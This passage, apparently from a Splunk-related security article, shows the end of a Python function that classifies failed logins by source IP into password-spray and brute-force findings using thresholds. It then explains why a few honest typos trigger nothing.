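    for (ip, _window), per_user in failures.items():
        distinct = len(per_user)
        worst_user, worst = max(per_user.items(), key=lambda kv: kv[1])
        # Many accounts, few tries each: the "spray" shape.
        if distinct >= SPRAY_MIN_USERS and worst <= SPRAY_MAX_PER_USER:
            findings.append(("password_spray", ip,
                             f"{distinct} accounts, at most {worst} tries each"))
        # One account, many tries: ordinary brute force.
        elif worst >= BRUTE_MIN_ATTEMPTS:
            findings.append(("brute_force", ip,
                             f"{worst} failures against {worst_user}"))
    return findings
```

Alice's two typos fall under both thresholds and produce no finding, which is the point of keying on source IP and distinct accounts rather than on any single failure.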

Ready to fight cyber threats with Splunk?

Learn more about the top cybersecurity threat detections with Splunk and MITRE ATT&CK.